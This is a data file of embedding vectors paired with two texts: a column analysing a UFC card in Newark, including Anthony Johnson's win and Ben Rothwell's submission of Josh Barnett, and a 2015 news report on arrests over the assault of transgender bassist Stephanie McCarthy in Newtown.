[ -0.001977465581148863, 0.02634810097515583, 0.007894540205597878, -0.00855215173214674, 0.017040405422449112, -0.008188460022211075, -0.011445240117609501, -0.07276565581560135, 0.05536471679806709, 0.01577153429389, 0.09725584834814072, 0.00601845420897007, 0.128822460770607, -0.03787623345851898, -0.057410355657339096, 0.017073392868041992, -0.009706368669867516, -0.0788814052939415, -0.03405441343784332, 0.055445924401283264, 0.0026100806426256895, -0.005427032709121704, 0.07760743051767349, 0.014588200487196445, 0.030140871182084084, 0.11464224755764008, 0.01537865400314331, -0.019894421100616455, -0.06156603991985321, -0.06021296605467796, 0.07156472653150558, -0.07152508199214935, -0.004655584692955017, -0.024657830595970154, 0.05028892681002617, 0.09312885999679565, 0.16693711280822754, -0.008248094469308853, 0.0031258342787623405, 0.033018652349710464, 0.061932969838380814, -0.05024321377277374, 0.05044981837272644, 0.00795250665396452, -0.06158449128270149, -0.014962855726480484, -0.013881397433578968, 0.005011468194425106, -0.04603390768170357, -0.04505791887640953, -0.006977706216275692, -0.0974128469824791, 0.029744712635874748, -0.021755428984761238, 0.006043499335646629, -0.07061272114515305, -0.010892384685575962, 0.05897871032357216, 0.014356082305312157, -0.003189714625477791, 0.0007771480595692992, 0.08026564866304398, 0.038897957652807236, -0.04555363953113556, -0.08040998131036758, -0.009278967045247555, 0.13487067818641663, -0.03209439665079117, -0.03193975239992142, -0.05748884007334709, -0.010051609948277473, 0.014395489357411861, 0.06384316831827164, -0.024407675489783287, -0.04759508743882179, -0.0134682422503829, 0.02258099801838398, -0.0315251387655735, -0.08006338030099869, -0.07800333201885223, 0.126562237739563, 0.07042740285396576, 0.09150655567646027, 0.04334215074777603, 0.02734299935400486, 0.02184947393834591, -0.0020512572955340147, -0.046960361301898956, 0.049525052309036255, 0.021988751366734505, -0.07053639739751816, -0.004090514499694109, -0.02413329854607582, -0.02489849552512169, 0.1828729212284088, -0.050181515514850616, -0.01024678349494934, 0.07467903941869736, -0.015487427823245525, 0.007470496464520693, 0.006605296861380339, -0.04223092645406723, -0.0565652996301651, -0.07217717170715332, 0.023852895945310593, 0.031105225905776024, -0.057558491826057434, 0.008863268420100212, -0.09517824649810791, -0.06147366389632225, -0.03289550915360451, 0.012725705280900002, -0.07369411736726761, -0.061590321362018585, 0.06698819994926453, -0.03697572275996208, -0.06509377807378769, 0.0037538637407124043, -0.06182350218296051, -0.004789901897311211, -0.011972795240581036, 0.035379014909267426, 0.033791933208703995, 0.07294008880853653, 0.05001407116651535, 0.023706205189228058, -0.2125842571258545, 2.1098376886123136e-33, -0.007044525351375341, 0.035364553332328796, -0.05907121300697327, -0.028715861961245537, -0.11110015958547592, -0.102943055331707, -0.07666540145874023, 0.071629598736763, -0.02702348865568638, 0.0702282041311264, -0.03319065645337105, 0.00904897041618824, 0.05512075871229172, 0.09047236293554306, 0.008361984975636005, -0.07100461423397064, 0.010795347392559052, -0.014486989937722683, 0.003356822533532977, -0.05991288647055626, -0.0749996080994606, -0.006682198494672775, 0.023319849744439125, -0.029343558475375175, -0.008286211639642715, -0.00782020017504692, -0.02586391009390354, 0.05259985476732254, -0.023146014660596848, 0.007039947900921106, 0.0003356582601554692, -0.0011450002202764153, -0.007357185706496239, -0.04814061149954796, -0.02342420071363449, 0.018704388290643692, 0.004286689683794975, -0.03533400222659111, 0.013617066666483879, -0.03300830349326134, 0.024728376418352127, 0.11478319019079208, -0.00009901267912937328, -0.005431408062577248, -0.005915394518524408, 0.05337917059659958, -0.02713969722390175, -0.10569412261247635, -0.021342085674405098, -0.021679462864995003, 0.012916207313537598, -0.006282654590904713, 0.015972035005688667, -0.04113113880157471, -0.040996845811605453, -0.0018874489469453692, -0.06523013114929199, 0.05937277525663376, 0.010903403162956238, 0.05926880985498428, -0.013202901929616928, 0.029425619170069695, -0.09742828458547592, 0.014542768709361553, -0.07662482559680939, -0.06652864068746567, 0.03351921960711479, 0.021505234763026237, 0.042623892426490784, -0.03495267778635025, -0.04155168682336807, 0.021766088902950287, 0.040064845234155655, -0.0032072626054286957, -0.03427381440997124, -0.009166133590042591, 0.04565640911459923, -0.024879733100533485, -0.017469443380832672, 0.018480613827705383, 0.07976449280977249, 0.03617466241121292, 0.03291096165776253, -0.033535879105329514, -0.004834659863263369, 0.04991389065980911, -0.009930743835866451, -0.05806215852499008, -0.10904103517532349, 0.05541803687810898, -0.037232041358947754, -0.003067183541134, -0.03791946917772293, -0.01776641607284546, -0.045217521488666534, -3.9678044067258434e-33, 0.10331542044878006, 0.02101149968802929, -0.021223565563559532, -0.04419552534818649, 0.04863140359520912, 0.04177389293909073, -0.02613312005996704, 0.02298692986369133, -0.04255680739879608, -0.006352911237627268, -0.002925288863480091, -0.026705604046583176, -0.01051883865147829, -0.024278292432427406, 0.044408202171325684, -0.05530700087547302, 0.018681606277823448, -0.06455843150615692, -0.006646998692303896, -0.039622340351343155, 0.005425891373306513, 0.07354698330163956, -0.04359894618391991, -0.02898736670613289, 0.03853870555758476, 0.03741012513637543, 0.09339767694473267, 0.04087279736995697, 0.015177687630057335, 0.04539285972714424, 0.017974143847823143, -0.06754239648580551, 0.009228302165865898, 0.0029029601719230413, -0.03104246035218239, 0.08694876730442047, -0.0264262817800045, 0.004722048528492451, -0.02641933783888817, -0.03260442242026329, -0.03134748339653015, 0.11565496027469635, -0.017014050856232643, -0.051171720027923584, -0.10472933202981949, 0.12061405181884766, 0.07074909657239914, 0.07568337023258209, 0.014940735884010792, -0.07647467404603958, -0.040461715310811996, 0.03645208477973938, 0.037856634706258774, 0.01578723080456257, -0.018696319311857224, -0.006322572939097881, -0.10997295379638672, -0.03326369822025299, 0.04536214843392372, -0.04316280037164688, -0.01734132319688797, 0.009741588495671749, -0.00214210944250226, 0.04954881966114044, 0.0017693608533591032, 0.007502693682909012, -0.0053469473496079445, -0.07464074343442917, -0.03343138098716736, 0.037198565900325775, -0.008060282096266747, -0.04269762709736824, -0.05311567708849907, -0.0023801319766789675, 0.05179670825600624, -0.025407837703824043, -0.11533767729997635, -0.015071583911776543, -0.09226269274950027, 0.036016177386045456, 0.06353799998760223, -0.07791779935359955, -0.08010045439004898, 0.04538732022047043, 0.11381205171346664, 0.054697174578905106, 0.06584963202476501, 0.07917310297489166, 0.008235372602939606, -0.004167713690549135, -0.02123476006090641, -0.13116297125816345, -0.0049675158224999905, 0.041947394609451294, 0.013317969627678394, -5.8939239266919685e-8, -0.029721621423959732, 0.013752862811088562, 0.06806134432554245, 0.023280933499336243, 0.02458111010491848, -0.00016441381012555212, -0.018989358097314835, 0.05357014015316963, 0.0075510963797569275, -0.03443654999136925, 0.02061951532959938, 0.060511428862810135, -0.04151025786995888, -0.018758153542876244, -0.038383156061172485, 0.042580801993608475, -0.008472477085888386, -0.0033566600177437067, 0.018298620358109474, -0.04346267879009247, 0.02768130600452423, -0.04052971675992012, -0.029254918918013573, 0.0006279609515331686, 0.0635797455906868, 0.02593696489930153, -0.08536677807569504, 0.007547593209892511, -0.029431594535708427, 0.08935437351465225, 0.002541120396926999, -0.015113835223019123, -0.007967216894030571, -0.05527501553297043, 0.015690291300415993, -0.004137469455599785, -0.017132077366113663, -0.0062662470154464245, -0.022348370403051376, -0.009573724120855331, 0.039020899683237076, 0.025692366063594818, 0.08450377732515335, 0.024619944393634796, 0.00045158693683333695, 0.03659974783658981, 0.009343048557639122, -0.09406513720750809, 0.03849584981799126, -0.03894292563199997, 0.05920920893549919, 0.004915277939289808, 0.01653221808373928, 0.14190514385700226, -0.014848821796476841, -0.06717292219400406, 0.023230314254760742, 0.003646137658506632, 0.0011718982132151723, 0.0870116725564003, 0.014932746067643166, -0.025389399379491806, 0.04945756867527962, -0.017930421978235245 ]
After the first two UFC shows of the year, the talk was about close decisions and controversial judging. After the third show on Saturday night, it was mostly about surprise submissions. Anthony "Rumble" Johnson's 86-second knockout win over Ryan Bader in the main event, putting him in the front of the line for a future light heavyweight title shot, was neither a surprise nor a submission. It was impressive given how little time it took Johnson to put Bader away. But anytime Johnson fights, the lights can go out on his opponent at a moment's notice. Josh Barnett losing to Ben Rothwell in a heavyweight showdown was a minor upset, but on its own, wouldn't have been a huge surprise. Barnett losing via submission to Rothwell, well, that's another story. Similarly, Sage Northcutt losing, while not expected by most, was something bound to happen at some point as it would be with almost fighter in the sport. At the age of 19, writing a fighter off based on one loss is preposterous. But the nature of his submission loss opened up some real questions, and ended up after the fact, being the most talked about story on the show. With Barnett, in a 19-year MMA career, he had never tapped out to a submission hold. He did submit in a 2004 fight with Mirko Cro Cop, but that wasn't from a submission application, but a shoulder injury that he couldn't continue fighting with. He had tapped out in pure submission competition, but those losses also came in 2000, and his ground game is ridiculously more advanced today than it was at that point. Rothwell had only used a submission maneuver to win one fight in the last eight years, over Matt Mitrione, and had never tapped out someone at Barnett's level. The main take is that anything can happen in the sport. When someone who is 38 loses, the question is always about whether they should continue. But Barnett was facing someone who now has to be in the discussion for a heavyweight title shot, and was competitive with him the entire way until the shocking finish. There was nothing in the fight that said that if they were rematched, Barnett wouldn't have a good shot of winning. Barnett won the first round on all three scorecards, and simply left himself open on a takedown attempt. For Northcutt, the situation was very different. It wasn't the shock of him getting caught, it was of him tapping at the moment he did. Northcutt (7-1), had taken the first round from Bryan Barbarena (11-3), in a fight put together clearly to showcase Northcutt on FOX. Northcutt has been a UFC pet project since Dana White introduced him on his "Lookin' for a Fight" YouTube show in the fall. This isn't a sport where one loss puts you on the scrap heap. But when Northcutt tapped to an arm triangle while holding half guard, a move that is rarely if ever a submission on the major league stage, and in a fight where he never looked in serious trouble, it opened up real questions. Every UFC fighter, from Jon Jones on down, is going to face serious adversity during their career. Even the most talented fighters have bad days. The mark of a top fighter is someone who when put in an adverse position, usually gets out of trouble. No matter how talented a fighter is, if they don't have the mentality to do that, they are not going very far in this sport. It was less than two months ago when UFC was promoted a show around "Sage and Paige," the hot prospects, with hot having a different meaning than one usually uses for it for fighters. There was actually discussion on television and in the media regarding both, including whether either could beat Jon Jones' record for the youngest UFC champion ever. The discussions were premature to begin with, and today those talks seem laughable. Both lost, and it wasn't because they got caught with a punch, or because of a bad decision. They were both exposed as being nowhere near top level. But with Paige VanZant, her loss was because she didn't have the skill, but in losing, she showed unquestioned heart. She fought through round-after round without an answer for her opponent. She still continued to get out of one bad position after another. With Northcutt, he seemed the more skilled of the two men in the cage. In his fight with Cody Pfister, there was a hole in his game, that when he is on his back, he doesn't get up so quickly. But he survived and came back to win that fight. When the same thing happened in round two with Barbarena, he once again didn't get up quickly. This time he tapped in a spot nobody expected him to. Already resented by some fighters and fans because of his face, physique, hype and paycheck, the slightest hint of being unable to handle adversity added to his character traits is only going to make him resented even worse. Northcutt since revealed that he nearly pulled out of the fight with strep throat, and fought while loaded up on antibiotics. Fighting probably wasn't the smartest move in hindsight. He'll have every opportunity to rebound, but discussions and expectations about championships are going to have to be earned in the cage going forward. Let's look at how Fortunes Changed for Five stars of Saturday night's show at the Prudential Center in Newark, N.J. ANTHONY JOHNSON - Johnson (21-5) was here right here a year ago. In a bout to determine the next light heavyweight title contender on the January FOX main event, Johnson flattened Alexander Gustafsson in 2:15. He then lost his title bout to Daniel Cormier. Now, he's likely to face the winner of Jones vs. Cormier II, even if Cormier says otherwise. Cormier's version of the top of the division is he's beating Jones in their rematch, and then facing Jones in the rubber match, and that Johnson will have to wait until 2017. If Jones wins, there is no question Johnson should be his first opponent. If things go like Cormier says, and Johnson would have to wait a long time, Glover Teixiera (24-4) makes the most sense as the next opponent. With Johnson's power, whether it's Jones, Cormier or Teixeira, they can't afford a mistake, because one bad position, or being open for one punch can end the night quickly. RYAN BADER - Bader's five-fight winning streak went down fast. Bader, more and more, is looking like a fighter who can remain high in the division for years, but when matched against the true elite fighters, like Johnson and Jones, he doesn't fare well. As far as who he should fight next, the best foes would be Alexander Gustafsson (16-4) or Teixeira. With Gustafsson, a win would be the quickest way out of the perception as a contender who can't be champion. It's a logical match at this point. Gustafsson may have lost three of four, but he took both Jones and Cormier to the limit. Bader lost to Teixeira in 2013, in a short fight where both men ended up in trouble right away. BEN ROTHWELL - Rothwell's win, most notably the matter which he won and the stage he won it on, makes the heavyweight championship picture even more interesting. Dana White said earlier in the week that Cain Velasquez, who was to get a title shot at Fabricio Werdum this week, would be undergoing back surgery. However, he also said Velasquez would only be out for four weeks. With Werdum also being out due to several injuries, the company is filled with options. Werdum (20-5-1) could face Velasquez (13-2), as was planned. Velasquez is the biggest name with the most UFC championship and main event history of the four viable contenders. Rothwell (36-9), has won four in a row, including a win over Alistair Overeem. Overeem (40-14, 1 no contest), has three wins in a row, the last two over Roy Nelson and Junior Dos Santos. He's also not under contract at this point, but the UFC does have the right to match any outside offer. Stipe Miocic (14-2), has won five of six, with the loss close against Dos Santos. But his last fight was a 50-second win over Andrei Arlovski, coming off a stoppage of Mark Hunt. When Velasquez went down, Miocic was the person the UFC picked for the title shot. If the UFC goes with Velasquez as the next contender, then Rothwell vs. Miocic looks the way to go. If they go with Overeem as the contender, the same still goes. If it's Miocic, then Velasquez vs. Overeem looks like a viable direction, leaving Rothwell with Dos Santos (17-4) or Travis Browne (18-3-1). JOSH BARNETT - Even though he lost, Barnett has no shortage of opponents for a high profile fight. Arlovski (25-11), Junior dos Santos (17-4) and Mark Hunt (11-10-1) could all main event a television show against Barnett or be a strong main card fight on pay-per-view. A win would keep him strong in a division that lacks depth, and a division where age isn't as much of a factor because most of the top 15 are over 35. WILSON REIS - Reis (20-6) scored a solid decision win over Dustin Ortiz (15-5) in a prelim fight that pitted two ranked flyweights against each other. Reis put on a dominant takedown and grappling performance to move to 3-1 since debuting as a flyweight. Both Kyoji Horiguchi (16-2) and Louis Smolka (10-1) are awaiting opponents and either fight would be a solid contenders fight. The problem with flyweight is that nobody sees anyone being able to beat Demetrious Johnson, so the movement in the top ten isn't focused on as much as in other weight classes.
[ -0.03297834098339081, -0.017750350758433342, -0.02787657454609871, 0.0511515773832798, 0.02173895761370659, 0.12052737176418304, 0.011745192110538483, 0.05318640545010567, 0.054218679666519165, 0.00763236777856946, -0.02294379472732544, -0.03260352835059166, 0.005170965567231178, 0.05372269079089165, -0.01076962985098362, -0.0032083801925182343, 0.03352624550461769, 0.016068466007709503, -0.032162606716156006, 0.013886493630707264, 0.022144857794046402, 0.03853985667228699, -0.0398283377289772, 0.03798133507370949, 0.0734003409743309, -0.04503975436091423, -0.006149243097752333, -0.020385023206472397, -0.00041500257793813944, -0.02046077698469162, 0.1242186650633812, -0.09143579751253128, 0.04083412513136864, -0.03189580887556076, -0.11695503443479538, -0.07631862163543701, -0.06407180428504944, 0.0759568065404892, 0.004621367901563644, 0.011389986611902714, -0.03616691380739212, -0.049846623092889786, 0.008934339508414268, -0.0473458357155323, 0.05203351378440857, -0.05647871643304825, 0.051373228430747986, -0.04863465949892998, 0.02790563926100731, -0.05122208595275879, -0.002504433039575815, -0.06671958416700363, 0.08973155915737152, -0.024884836748242378, 0.05149029940366745, 0.04934762790799141, 0.0125156594440341, -0.019696615636348724, 0.013164712116122246, -0.033989448100328445, 0.05016491189599037, -0.024742018431425095, -0.02277356944978237, 0.02257753349840641, 0.008748623542487621, 0.013771436177194118, 0.015666410326957703, 0.04967445135116577, 0.09489262104034424, 0.08055336028337479, 0.04340548440814018, 0.01668558269739151, -0.05775581672787666, -0.04127362370491028, -0.0025548492558300495, 0.053814392536878586, -0.004664357751607895, 0.05088517442345619, 0.012743866071105003, 0.028627080842852592, 0.06543401628732681, 0.003313498804345727, -0.02925502136349678, -0.02834732085466385, 0.03861868008971214, -0.02073894441127777, 0.0406796969473362, -0.0009253184543922544, -0.03279903158545494, -0.04166388139128685, -0.06410661339759827, 0.0065009561367332935, 0.035900749266147614, 0.05125664919614792, 0.06578425318002701, -0.026322389021515846, -0.006667586043477058, -0.0022212285548448563, 0.015943901613354683, 0.0405597947537899, 0.06860099732875824, 0.10353167355060577, -0.04131011664867401, -0.04614098370075226, 0.12114956974983215, 0.03426495939493179, -0.034518543630838394, -0.01953042484819889, -0.02131759375333786, -0.021457042545080185, 0.011211758479475975, 0.030056217685341835, 0.014071132056415081, 0.04785384237766266, 0.07349508255720139, 0.08484938740730286, 0.010545175522565842, 0.08799774944782257, -0.08300650864839554, 0.04728420823812485, -0.009871961548924446, 0.030151423066854477, -0.036571063101291656, 0.013114367611706257, 0.05581585317850113, 0.012182772159576416, -0.005444260314106941, 3.60834080563828e-33, 0.10341493040323257, -0.07263926416635513, -0.09638701379299164, 0.06435615569353104, 0.054494719952344894, 0.019089527428150177, 0.0017820438370108604, -0.0647498071193695, 0.04528076574206352, 0.04357541725039482, 0.04319503530859947, -0.05811768025159836, 0.030209951102733612, -0.01908774860203266, -0.002670079004019499, 0.08514174818992615, -0.018613535910844803, -0.027342895045876503, -0.0479651615023613, -0.008422531187534332, -0.07758203893899918, 0.07856045663356781, -0.08553624153137207, -0.055767469108104706, -0.05764858052134514, 0.08018925786018372, 0.03564313426613808, -0.017438974231481552, -0.05769465118646622, -0.057256124913692474, -0.05259820818901062, 0.031770747154951096, 0.020019305869936943, 0.048828188329935074, 0.037676092237234116, -0.059563059359788895, 0.03164410963654518, -0.04816170409321785, 0.023149840533733368, 0.057814404368400574, -0.057636916637420654, 0.08313271403312683, -0.10397868603467941, -0.049436505883932114, 0.008024551905691624, -0.07768116891384125, -0.04489196091890335, 0.030299358069896698, -0.01276205014437437, 0.006917634978890419, 0.02805079147219658, 0.01704588159918785, 0.09024420380592346, 0.08079075813293457, 0.030304674059152603, -0.014967143535614014, 0.04146198555827141, 0.0037929504178464413, 0.027602151036262512, 0.04816178232431412, -0.007479356601834297, 0.0029353019781410694, -0.048615675419569016, 0.006211203522980213, -0.13716557621955872, -0.012993467971682549, -0.06473615020513535, 0.01787036843597889, -0.10849963873624802, 0.0001518451899755746, 0.0059046815149486065, 0.03419363498687744, -0.09756116569042206, -0.1632714718580246, 0.09989013522863388, -0.060488831251859665, -0.03421054407954216, 0.006007612217217684, 0.017719563096761703, -0.012540698982775211, -0.0028136090841144323, 0.0035097289364784956, 0.012839796021580696, -0.037569958716630936, -0.07271082699298859, -0.08204736560583115, -0.01060014683753252, -0.015164663083851337, 0.007284082006663084, 0.06813447177410126, -0.015439840964972973, -0.01877417601644993, -0.008163048885762691, 0.005661265458911657, 0.027879461646080017, -2.943859379386373e-33, -0.06986244767904282, 0.057945616543293, -0.12698060274124146, 0.08743713796138763, 0.06612483412027359, -0.0649496391415596, -0.038324493914842606, 0.04507176950573921, 0.03685395419597626, -0.0903007984161377, 0.058755870908498764, -0.04822695627808571, -0.06369677931070328, 0.018006818369030952, 0.07475347816944122, -0.10416298359632492, -0.0037395847029983997, 0.022550120949745178, -0.016413554549217224, -0.021283334121108055, 0.13629576563835144, 0.013842604123055935, -0.13779041171073914, -0.08774968981742859, 0.06792546808719635, 0.046863775700330734, -0.01948990486562252, 0.04343098774552345, -0.04713161662220955, 0.0015698869246989489, 0.01515757292509079, -0.007318056188523769, 0.016903992742300034, 0.06138043478131294, 0.017311107367277145, 0.10993056744337082, 0.010856498964130878, 0.037455081939697266, -0.01573832705616951, 0.08098165690898895, 0.0425022728741169, -0.009620276279747486, 0.019709117710590363, 0.05635261535644531, -0.025067994371056557, -0.008533883839845657, -0.07224889099597931, -0.023044388741254807, 0.08833424001932144, -0.006828601937741041, -0.03925434872508049, -0.05522962659597397, -0.014365154318511486, 0.1432030349969864, -0.0510794073343277, 0.020457211881875992, 0.040333300828933716, 0.018489396199584007, -0.0023920710664242506, 0.07285167276859283, -0.073139488697052, -0.04069763422012329, 0.010353777557611465, -0.02539774402976036, -0.006689826957881451, -0.03245415911078453, -0.010249782353639603, 0.03762175142765045, -0.02752452716231346, -0.009185501374304295, -0.006196198984980583, -0.018819356337189674, 0.0009059678413905203, 0.049913544207811356, 0.0361645445227623, 0.10577014833688736, -0.027287499979138374, 0.02572023496031761, -0.01845390722155571, -0.034004200249910355, -0.023695083335042, -0.041890114545822144, 0.020680462941527367, -0.015970749780535698, 0.034866247326135635, 0.06305881589651108, -0.005031605716794729, -0.09605555236339569, -0.0033461900893598795, -0.06297140568494797, 0.08679144829511642, -0.04137081280350685, 0.01406326424330473, -0.02794930897653103, 0.03196680173277855, -5.442909056796452e-8, -0.04551330953836441, 0.008964721113443375, -0.10318785905838013, 0.027538781985640526, 0.0023535636719316244, 0.08171718567609787, 0.047902222722768784, -0.043047964572906494, -0.02642962336540222, 0.10676412284374237, 0.09173262119293213, -0.00323084881529212, -0.020398881286382675, -0.07415136694908142, -0.02777530811727047, -0.029664304107427597, -0.06429886072874069, -0.0523793064057827, -0.028508130460977554, -0.008352622389793396, -0.006485537625849247, -0.0394839271903038, -0.023864127695560455, -0.0313585065305233, -0.0010781028540804982, -0.05330881476402283, 0.017533451318740845, 0.15114033222198486, -0.028440268710255623, 0.018761539831757545, 0.0012717533390969038, 0.009735887870192528, 0.01652933843433857, 0.05762219429016113, 0.05920948088169098, 0.0192946158349514, 0.016392530873417854, 0.04913434386253357, 0.08844024688005447, 0.015796616673469543, -0.1129116415977478, -0.05974539741873741, 0.008648741990327835, -0.01725115068256855, 0.03497711196541786, -0.028622956946492195, -0.011533763259649277, -0.028765849769115448, -0.036791227757930756, -0.07072046399116516, 0.04054482653737068, -0.062826007604599, 0.022068284451961517, 0.019011851400136948, 0.030048908665776253, 0.029875969514250755, -0.02005741558969021, -0.016531215980648994, -0.042891666293144226, -0.03621218726038933, -0.036625370383262634, -0.04967397451400757, -0.038445595651865005, 0.03911576792597771 ]
Written by Nastassia Baroni on June 13, 2015 Police have charged a second man in relation to the bashing of transgender woman Stephanie McCarthy, bassist for Sydney band Love Maul, at Newtown’s The Town Hall Hotel on Friday night, 5th June. Police executed a search warrant at a Balmain home yesterday, Friday 12th June, seizing clothing and other items, including “a small quantity of cannabis”. They arrested a 22-year-old man who has been charged with recklessly inflicting grievous bodily harm, assault occasioning actual bodily harm, affray and possessing a prohibited drug. He is the second person to be arrested and charged in relation to the bashing of bashing of the 43-year-old McCarthy, as she was waiting to perform with her band at Newtown’s The Town Hall Hotel. Earlier this week, police arrested and charged a 23-year-old man in relation to this matter. Both men will appear before Newtown Local Court on Thursday 9th July 2015. McCarthy claimed that the incident was an act of transphobia, committed by a group of men at the hotel who had been following her around all night. After the incident, in which she alleges the men pulled her hair and repeatedly punched her in the face, she shared a picture of her bruises and injuries. She also said Sydney’s lockout laws had contributed to the rise of violence and hate-related assults on the streets of Newtown, which is outside of the lockout zones. “There are people who are going out here on a Friday or Saturday night that would have never, ever come to Newtown previously,” McCarthy said. “I’m one in a long line of people who’ve been assaulted of late. Everyone has been a target – transgender, gay, lesbian – people who look different. I’ve heard of punks getting assaulted, goths getting assaulted – it’s insane.” Police investigations into the matter are continuing, and officers are still urging anyone who might have information about the incident to contact Crime Stoppers. The incident has sparked a massive outcry from the citizens of Newtown, who took to the streets shortly after the incident to voice their support for McCarthy and the trans community, and protest against violence and transphobia. Watch: Protest Against Violence And Transphobia Outside Town Hall Hotel, Newtown
[ -0.001961261499673128, 0.05348116531968117, -0.0583273321390152, 0.016722969710826874, 0.03109729290008545, 0.06347841024398804, 0.04130225256085396, 0.007488250266760588, 0.004928685259073973, 0.075194351375103, 0.091509148478508, -0.038002632558345795, 0.047746315598487854, 0.016306614503264427, 0.010709638707339764, 0.017383819445967674, -0.008305998519062996, -0.03439014032483101, -0.01894797943532467, 0.1105707660317421, -0.040536560118198395, 0.03399035334587097, 0.03779613599181175, -0.011564260348677635, -0.06028914079070091, 0.02096928469836712, -0.03662876412272453, 0.017077898606657982, -0.04919222742319107, -0.003413800848647952, 0.013524817302823067, 0.055161550641059875, -0.024958377704024315, 0.05617888271808624, 0.047460898756980896, -0.007067618425935507, 0.050158195197582245, 0.08741085231304169, 0.08478056639432907, -0.0026913245674222708, 0.044344596564769745, -0.11069823801517487, 0.03364796191453934, -0.01250516064465046, -0.03377840667963028, -0.01653348095715046, 0.039223406463861465, 0.05052861198782921, -0.008059109561145306, -0.053502392023801804, 0.04750147461891174, -0.039583124220371246, 0.01267746090888977, 0.008118695579469204, -0.011680543422698975, -0.008717154152691364, -0.023585878312587738, 0.05209100991487503, 0.035925716161727905, -0.026010068133473396, 0.047100648283958435, 0.027877675369381905, -0.022787565365433693, 0.0007704492891207337, -0.020040657371282578, -0.0722522884607315, -0.025297250598669052, -0.044331371784210205, 0.12526266276836395, 0.0551648885011673, 0.10614558309316635, 0.0017899617087095976, -0.0043397704139351845, -0.03017631359398365, -0.00032965795253403485, 0.014286994934082031, 0.04523831605911255, 0.0005289599066600204, 0.03791886195540428, -0.05975539609789848, 0.07800155133008957, -0.10588989406824112, 0.021038029342889786, -0.022919198498129845, 0.02675926499068737, -0.043557025492191315, -0.061069514602422714, -0.025206172838807106, -0.03700169920921326, -0.019677823409438133, -0.05388757586479187, 0.015630975365638733, -0.045162513852119446, -0.05752407759428024, 0.054511114954948425, -0.07030315697193146, -0.11837214976549149, 0.04628780111670494, -0.0940323993563652, 0.10330671072006226, -0.007323733996599913, 0.0918472483754158, -0.011398229748010635, 0.0012218215269967914, 0.04264150932431221, -0.056369099766016006, 0.07473006844520569, 0.020114054903388023, -0.021080728620290756, -0.02533426694571972, -0.008728750050067902, 0.01513067726045847, -0.009723871015012264, -0.06805610656738281, 0.11511357873678207, 0.07702284306287766, 0.05377107858657837, 0.05722538009285927, -0.04541361704468727, -0.034254200756549835, 0.014149414375424385, 0.009186932817101479, 0.0010076587786898017, 0.038654666393995285, -0.012197596952319145, -0.016993599012494087, -0.0018853615038096905, 4.702206257345576e-33, 0.030982578173279762, 0.019243987277150154, -0.08563517034053802, -0.055349208414554596, 0.14567981660366058, -0.011806697584688663, -0.015193209983408451, -0.047540899366140366, 0.018316157162189484, 0.04158933088183403, 0.009000325575470924, -0.11846598237752914, -0.020686596632003784, -0.0990559533238411, -0.01979059725999832, 0.08080920577049255, 0.007759329862892628, -0.026977604255080223, -0.020314037799835205, -0.03726132586598396, 0.036168746650218964, 0.03661894053220749, -0.0414552241563797, 0.09472505748271942, -0.09025408327579498, -0.02869962900876999, 0.04653768986463547, 0.03862956166267395, 0.11113394051790237, -0.009744380600750446, -0.0588749498128891, 0.11845669150352478, 0.03622937202453613, 0.029041068628430367, 0.06108061969280243, -0.012794235721230507, -0.014370088465511799, 0.012924592941999435, 0.02705499529838562, 0.01678825169801712, -0.011164353229105473, 0.0181348267942667, 0.04374966025352478, -0.02407766319811344, -0.11697404831647873, -0.035790782421827316, -0.12350010126829147, -0.02662009932100773, 0.015637539327144623, 0.017690811306238174, 0.0728875920176506, 0.03690588101744652, -0.05217743292450905, 0.09448038041591644, -0.05386669561266899, 0.0062896269373595715, -0.04333950951695442, -0.00831680465489626, 0.1275249868631363, 0.04733843356370926, 0.07850164920091629, 0.07282114028930664, -0.009754074737429619, 0.0010269396007061005, -0.07158994674682617, -0.1378069818019867, 0.007604192476719618, -0.055592216551303864, -0.014552364125847816, 0.05489875748753548, 0.03030230849981308, 0.030807193368673325, 0.08337331563234329, -0.09305428713560104, -0.006167416460812092, -0.01998201198875904, 0.00230328063480556, 0.013892026618123055, 0.09500128775835037, -0.028602663427591324, 0.026641907170414925, -0.03573212772607803, 0.018459264189004898, -0.021988553926348686, -0.12310633063316345, -0.05623013153672218, -0.018651405349373817, -0.11624442785978317, -0.02604065276682377, 0.07762308418750763, 0.04435081034898758, 0.004077489487826824, -0.06481395661830902, -0.06557530909776688, -0.006166854873299599, -5.572754598361515e-33, 0.030817991122603416, -0.004904662724584341, 0.015402364544570446, -0.00008886813884600997, 0.04146949201822281, -0.09285930544137955, -0.057067934423685074, -0.0301139485090971, 0.014494112692773342, -0.11427026987075806, -0.026845373213291168, -0.0329667404294014, -0.031783271580934525, 0.051068585366010666, 0.0657816156744957, -0.026184910908341408, 0.04495798796415329, 0.006905159913003445, 0.03419512137770653, 0.03900676965713501, 0.03107224963605404, 0.028694063425064087, -0.07433103770017624, 0.012500755488872528, -0.06403642147779465, 0.01689830981194973, 0.09987333416938782, 0.014371078461408615, -0.0010872870916500688, 0.015543213114142418, -0.04308947175741196, 0.004767604637891054, -0.006503605749458075, -0.011553147807717323, -0.07097039371728897, 0.017657479271292686, 0.004195567686110735, 0.07245306670665741, -0.01834939979016781, -0.03744778782129288, 0.05225784704089165, 0.022785505279898643, -0.06064409390091896, 0.04012659564614296, 0.03146715089678764, -0.004430478438735008, 0.05143165588378906, 0.028004512190818787, -0.006624544505029917, -0.02513798512518406, -0.01638074219226837, 0.011913836002349854, -0.006238083355128765, -0.007362221833318472, -0.01819583773612976, -0.05307459458708763, -0.06192656606435776, -0.0329706184566021, -0.007612401619553566, -0.0031160942744463682, 0.027093753218650818, 0.048880137503147125, -0.16305308043956757, -0.0920700952410698, 0.007425002753734589, 0.012069027870893478, -0.08725742250680923, -0.10820089280605316, -0.0005392215680330992, 0.08535866439342499, -0.030647164210677147, -0.060880351811647415, -0.028804806992411613, -0.0315667949616909, -0.002391512505710125, -0.04029950499534607, -0.033080656081438065, 0.028635935857892036, -0.009102634154260159, -0.04710084944963455, -0.033918555825948715, -0.035407546907663345, -0.05590652674436569, 0.0499560721218586, -0.051334481686353683, 0.032063838094472885, 0.09758438169956207, 0.015047434717416763, -0.030225180089473724, -0.003465400543063879, 0.028794603422284126, -0.05671754106879234, -0.02431068941950798, -0.0021751425229012966, -0.07024655491113663, -6.615703540546747e-8, -0.04708392545580864, -0.04364604130387306, -0.07592495530843735, 0.03666815906763077, 0.041197843849658966, 0.07058622688055038, 0.014499396085739136, -0.05701466649770737, 0.10054104030132294, 0.00476456992328167, 0.003031900618225336, 0.06366705149412155, 0.06817643344402313, -0.0671767145395279, -0.03280669450759888, 0.041092775762081146, -0.016546104103326797, -0.09265948086977005, 